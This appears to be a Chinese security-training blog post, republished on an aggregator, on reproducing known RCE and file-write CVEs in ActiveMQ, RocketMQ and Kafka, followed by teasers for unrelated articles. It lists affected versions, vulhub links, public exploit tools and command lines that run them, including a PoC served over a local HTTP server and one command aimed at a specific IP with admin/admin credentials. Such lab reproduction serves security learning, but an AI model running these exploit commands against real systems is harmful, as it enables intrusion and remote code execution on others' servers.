news 2026/5/13 12:31:09

服务攻防-处理平台安全消息队列ActiveMQRocketMQKafkaSpring包CVE复现

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
服务攻防-处理平台安全消息队列ActiveMQRocketMQKafkaSpring包CVE复现

知识点:
服务攻防-处理平台-消息队列&ActiveMQ&RocketMQ&Kafka


消息队列:(Message Queue
基于异步通信模式的中间件技术,核心功能是在不同的应用程序、服务或组件之间传递消息(数据),起到缓冲、解耦、削峰等作用。发送方(生产者)将消息放入队列后即可返回,无需等待接收方(消费者)立即处理;接收方则从队列中按需获取消息并处理,实现了发送方和接收方的异步解耦。

常见的消息队列产品包括:(广泛应用于分布式系统、微服务架构中)
Apache Kafka、RabbitMQ、ActiveMQ、RocketMQ

演示案例-服务攻防-处理平台-消息队列&ActiveMQ&RocketMQ&Kafka

一、ActiveMQ

端口 条件8161web 需配置访问61616tcp 远程访问 开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。

CVE-2022-41678

影响版本:5.16.5, 5.17.3版本及以前
参考文章:https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2022-41678/README.zh-cn.md

python poc.py-uadmin-padmin http://101.32.220.14:8161/




CVE-2023-46604

影响版本:5.18.2版本及以前

参考文章:https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2023-46604/README.zh-cn.md

python3-mhttp.server8888python3 poc.py 目标IP 目标端口 http://IP:8888/poc.xml





二、RocketMQ

端口号 用途说明9876NameServer通信端口用于客户端路由请求和Broker注册发现10911Broker主监听端口处理消息发送/消费等核心服务 Apache RocketMQ是一个分布式消息平台

文章复现参考:
https://mp.weixin.qq.com/s/UsjzX-HSt7QE1QeVBdEXaw
https://mp.weixin.qq.com/s/ceZY_TJqsaWyyHubrlKqSw

环境搭建:dockerpull apache/rocketmq:4.9.1dockerpull apacherocketmq/rocketmq-console:2.0.0dockerrun-d-p9876:9876-v/data/namesrv/logs:/root/logs-v/data/namesrv/store:/root/store--namermqnamesrv-e"MAX_POSSIBLE_HEAP=100000000"apache/rocketmq:4.9.1shmqnamesrv#1.创建broker文件目录mkdir-p/NDTSec/rocketmq/conf/#2.创建broker.conf文件vim/NDTSec/rocketmq/conf/broker.conf#3.将下面内容复制粘贴到broker.conf配置文件中:brokerClusterName=DefaultCluster brokerName=broker-a brokerId=0deleteWhen=04 fileReservedTime=48brokerRole=ASYNC_MASTER flushDiskType=SYNC_FLUSH#4.启动brokerdockerrun-d-p10911:10911-p10909:10909-v/data/broker/logs:/root/logs-v/data/broker/store:/root/store-v/NDTSec/rocketmq/conf/broker.conf:/opt/rocketmq/conf/broker.conf--namermqbroker--linkrmqnamesrv:namesrv-e"NAMESRV_ADDR=namesrv:9876"-e"MAX_POSSIBLE_HEAP=200000000"apache/rocketmq:4.9.1shmqbroker-c/opt/rocketmq/conf/broker.conf5、启动consoledockerrun-d--namermqconsole-p8899:8080--linkrmqnamesrv:namesrv-e"JAVA_OPTS=-Drocketmq.namesrv.addr=192.168.88.104:9876 -Dcom.rocketmq.sendMessageWithVIPChannel=false"-tapacherocketmq/rocketmq-console:2.0.0


CVE-2023-33246

文章参考:https://github.com/vulhub/vulhub/blob/master/rocketmq/CVE-2023-33246/README.zh-cn.md

项目工具:https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT

d:\Python3.8\python.exe check.py--ipip--port9876


项目工具:https://github.com/vulhub/rocketmq-attack

java-jarrocketmq-attack-1.1-SNAPSHOT.jar AttackBroker--targetip:port--cmd"xxxx"



CVE-2023-37582

项目工具:https://github.com/Malayke/CVE-2023-37582_EXPLOIT

python.exe CVE-2023-37582.py-ipip-p9876

项目工具:https://github.com/vulhub/rocketmq-attack

java-jarrocketmq-attack-1.1-SNAPSHOT.jar AttackNamesrv--target127.0.0.1:9876--file/tmp/test.txt--data"Hello World"

三、Kafka

分布式流处理平台,用于高吞吐量实时数据传输存储和处理, 广泛应用于日志收集、消息队列、数据管道、实时分析等场景。 默认端口:9092

CVE-2023-25194

漏洞影响版本:2.3.0 <= Apache Kafka <= 3.3.2

复现地址:https://github.com/vulhub/vulhub/blob/master/kafka/CVE-2023-25194/README.zh-cn.md






版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/13 12:30:15

LangChain RAG开发套件:模块化架构与生产级实践指南

1. 项目概述&#xff1a;一个面向RAG应用开发的“瑞士军刀”如果你正在或打算基于LangChain构建检索增强生成&#xff08;RAG&#xff09;应用&#xff0c;那么“Vargha-Kh/Langchain-RAG-DevelopmentKit”这个项目&#xff0c;很可能就是你一直在寻找的那个“工具箱”。它不是…

作者头像 李华
网站建设 2026/5/13 12:29:06

3步快速指南:如何在Windows电脑上直接安装Android应用?

3步快速指南&#xff1a;如何在Windows电脑上直接安装Android应用&#xff1f; 【免费下载链接】APK-Installer An Android Application Installer for Windows 项目地址: https://gitcode.com/GitHub_Trending/ap/APK-Installer APK Installer是一款专为Windows系统设计…

作者头像 李华
网站建设 2026/5/13 12:23:06

CodeMaker:如何用3个步骤让Java/Scala开发效率翻倍?

CodeMaker&#xff1a;如何用3个步骤让Java/Scala开发效率翻倍&#xff1f; 【免费下载链接】CodeMaker A idea-plugin for Java/Scala, support custom code template. 项目地址: https://gitcode.com/gh_mirrors/co/CodeMaker 还在为重复的实体类创建、DTO转换和API文…

作者头像 李华
网站建设 2026/5/13 12:21:54

Web安全:XSS跨站脚本攻击详解

Web安全&#xff1a;XSS跨站脚本攻击详解 1. XSS概述 XSS&#xff08;Cross-Site Scripting&#xff09;是一种代码注入攻击&#xff0c;攻击者通过在网页中注入恶意脚本代码&#xff0c;当用户浏览该页面时&#xff0c;恶意代码会在用户浏览器中执行&#xff0c;从而盗取用户信…

作者头像 李华
网站建设 2026/5/13 12:21:23

开源AI模型本地部署实战:从Hugging Face社区模型到私有化部署

1. 项目概述&#xff1a;从“Glucksberg/cristalina-v4”看开源AI模型社区化部署 最近在折腾本地AI部署的朋友&#xff0c;可能都绕不开Hugging Face这个“模型大本营”。今天想聊的&#xff0c;不是某个耳熟能详的GPT或Llama&#xff0c;而是一个在社区里逐渐有了些热度的名字…

作者头像 李华
网站建设 2026/5/13 12:19:42

Arkloop开源AI智能体平台:本地部署、多模型路由与沙箱执行实战

1. 项目概述与核心价值 最近在折腾AI智能体&#xff0c;发现市面上的平台要么是闭源的SaaS&#xff0c;用起来总感觉数据不在自己手里&#xff0c;心里不踏实&#xff1b;要么就是开源项目部署起来极其复杂&#xff0c;光是配环境、调参数就能劝退一大半人。直到我遇到了Arklo…

作者头像 李华